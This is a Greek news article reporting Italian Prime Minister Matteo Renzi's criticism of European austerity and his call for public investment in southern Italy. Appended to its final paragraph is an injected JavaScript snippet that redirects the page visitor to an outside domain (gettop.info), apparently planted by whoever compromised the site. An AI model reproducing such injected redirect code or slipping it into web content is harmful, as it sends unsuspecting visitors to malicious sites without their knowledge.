Ρέντσι: Χάθηκαν πολλές ευκαιρίες εξαιτίας της κουλτούρας της λιτότητας

0
6

«Χάθηκαν υπερβολικά πολλές ευκαιρίες εξαιτίας της κουλτούρας της λιτότητας. Είναι υπερβολικά πολύς ο χρόνος που σπαταλήθηκε», δήλωσε ο Ιταλός πρωθυπουργός Ματέο Ρέντσι, κατά τη διάρκεια επίσκεψής του στην πόλη Καλτανισέτα της Σικελίας.

«Πρόκειται για μια αυτοκτονική λογική, η οποία μείωσε κατά 50% τις δημόσιες επενδύσεις, περικόπτοντας στην Ιταλία 20 δισ. ευρώ χρηματοδοτήσεων», πρόσθεσε ο επικεφαλής της κυβέρνησης της Ρώμης.

Σύμφωνα με τον Ρέντσι, «η ανάπτυξη περνά και μέσω της οδού των δημοσίων έργων». Αναφερόμενος στην απόφαση του να αφαιρέσει κατά τις περασμένες ημέρες την σημαία της Ευρώπης από κάποια τηλεοπτικά και διαδικτυακά μηνύματά του, ο Ιταλός κεντροαριστερός πρωθυπουργός επεσήμανε:

«Τη σημαία αυτή την κρατάμε κοντά μας, δίπλα μας, αλλά της λέμε παράλληλα ότι θέλουμε η Ευρώπη να κάνει σωστά την δουλειά της. Μια δουλειά που σχετίζεται με την προαγωγή της ανάπτυξης και όχι μόνον της λιτότητας και με τις επενδύσεις στο μέλλον και όχι μόνον σε γραφειοκρατία».

O Ιταλός πρωθυπουργός δήλωσε βέβαιος ότι «αν ξαναπάρει μπρος η μηχανή των νότιων περιφερειών της χώρας, η Ιταλία μπορεί να μετατραπεί σε πραγματική ατμομηχανή της Ευρώπης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here